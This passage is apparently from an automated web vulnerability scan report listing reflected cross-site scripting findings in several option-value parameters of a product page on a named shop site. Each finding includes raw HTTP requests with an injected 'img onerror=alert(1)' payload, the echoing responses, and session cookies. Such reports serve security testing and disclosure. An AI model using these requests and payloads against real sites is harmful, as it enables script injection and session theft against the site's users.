Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; LANGUAGEID=1; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.1.10.1305467942

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:25:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:25:41 GMT
Content-Length: 178217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Boxa My Way Action | MUNICH MY WAY</title>

<meta http-equiv="C
...[SNIP]...
<script type="text/javascript" language="javascript">
                                       window.addEvent('domready', function(){var el = E('optionValue6463e9541';alert(1)//ee30cd37f24'); if( el && el.checked )el.onclick();var el = E('optionValue6463e9541';alert(1)//ee30cd37f24'); if( el && el.checked )el.onclick();var el = E('optionValue6463e9541';alert(1)//ee30cd37f24'); if( el &&
...[SNIP]...

3.83. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue100 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue100 request parameter is copied into the HTML document as plain text between tags. The payload f5b6b<img%20src%3da%20onerror%3dalert(1)>5a0874cdcf was submitted in the buyForm3021_optionValue100 parameter. This input was echoed as f5b6b<img src=a onerror=alert(1)>5a0874cdcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867f5b6b<img%20src%3da%20onerror%3dalert(1)>5a0874cdcf&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021

Response

HTTP/1.1 500 Invalid data 867f5b6b<img src=a onerror=alert(1)>5a0874cdcf for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:21:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:21:56 GMT
Content-Length: 14073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 867f5b6b<img src=a onerror=alert(1)>5a0874cdcf for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.84. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue101 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue101 request parameter is copied into the HTML document as plain text between tags. The payload a3ac9<img%20src%3da%20onerror%3dalert(1)>ca9319cd559 was submitted in the buyForm3021_optionValue101 parameter. This input was echoed as a3ac9<img src=a onerror=alert(1)>ca9319cd559 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893a3ac9<img%20src%3da%20onerror%3dalert(1)>ca9319cd559&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optio
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 893a3ac9<img src=a onerror=alert(1)>ca9319cd559 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:12:34 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:12:34 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 893a3ac9<img src=a onerror=alert(1)>ca9319cd559 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.85. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue102 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue102 request parameter is copied into the HTML document as plain text between tags. The payload 5b2b4<img%20src%3da%20onerror%3dalert(1)>2dae0cf4193 was submitted in the buyForm3021_optionValue102 parameter. This input was echoed as 5b2b4<img src=a onerror=alert(1)>2dae0cf4193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=9315b2b4<img%20src%3da%20onerror%3dalert(1)>2dae0cf4193&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_o
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 9315b2b4<img src=a onerror=alert(1)>2dae0cf4193 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:10:29 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:10:28 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 9315b2b4<img src=a onerror=alert(1)>2dae0cf4193 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.86. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue103 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue103 request parameter is copied into the HTML document as plain text between tags. The payload 1d394<img%20src%3da%20onerror%3dalert(1)>839fc1af98d was submitted in the buyForm3021_optionValue103 parameter. This input was echoed as 1d394<img src=a onerror=alert(1)>839fc1af98d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=9601d394<img%20src%3da%20onerror%3dalert(1)>839fc1af98d&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_opti
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 9601d394<img src=a onerror=alert(1)>839fc1af98d for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:17:45 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:17:44 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 9601d394<img src=a onerror=alert(1)>839fc1af98d for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.87. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue104 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue104 request parameter is copied into the HTML document as plain text between tags. The payload e956a<img%20src%3da%20onerror%3dalert(1)>961ffc32d71 was submitted in the buyForm3021_optionValue104 parameter. This input was echoed as e956a<img src=a onerror=alert(1)>961ffc32d71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993e956a<img%20src%3da%20onerror%3dalert(1)>961ffc32d71&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 993e956a<img src=a onerror=alert(1)>961ffc32d71 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:11:31 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:11:31 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 993e956a<img src=a onerror=alert(1)>961ffc32d71 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.88. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue234 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue234 request parameter is copied into the HTML document as plain text between tags. The payload 20625<img%20src%3da%20onerror%3dalert(1)>ec7ca72f201 was submitted in the buyForm3021_optionValue234 parameter. This input was echoed as 20625<img src=a onerror=alert(1)>ec7ca72f201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ons=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=490120625<img%20src%3da%20onerror%3dalert(1)>ec7ca72f201&id=3021

Response

HTTP/1.1 500 Invalid data 490120625<img src=a onerror=alert(1)>ec7ca72f201 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:23:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:23:55 GMT
Content-Length: 14077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 490120625<img src=a onerror=alert(1)>ec7ca72f201 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.89. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue89 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue89 request parameter is copied into the HTML document as plain text between tags. The payload b535d<img%20src%3da%20onerror%3dalert(1)>da236fdb197 was submitted in the buyForm3021_optionValue89 parameter. This input was echoed as b535d<img src=a onerror=alert(1)>da236fdb197 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ions=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534b535d<img%20src%3da%20onerror%3dalert(1)>da236fdb197&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 534b535d<img src=a onerror=alert(1)>da236fdb197 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:14:39 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:14:38 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 534b535d<img src=a onerror=alert(1)>da236fdb197 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.90. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue90 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue90 request parameter is copied into the HTML document as plain text between tags. The payload c4005<img%20src%3da%20onerror%3dalert(1)>d2da79f8cd3 was submitted in the buyForm3021_optionValue90 parameter. This input was echoed as c4005<img src=a onerror=alert(1)>d2da79f8cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570c4005<img%20src%3da%20onerror%3dalert(1)>d2da79f8cd3&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021

Response

HTTP/1.1 500 Invalid data 570c4005<img src=a onerror=alert(1)>d2da79f8cd3 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:22:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:22:56 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 570c4005<img src=a onerror=alert(1)>d2da79f8cd3 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.91. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue91 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue91 request parameter is copied into the HTML document as plain text between tags. The payload 25a69<img%20src%3da%20onerror%3dalert(1)>60e211932b3 was submitted in the buyForm3021_optionValue91 parameter. This input was echoed as 25a69<img src=a onerror=alert(1)>60e211932b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
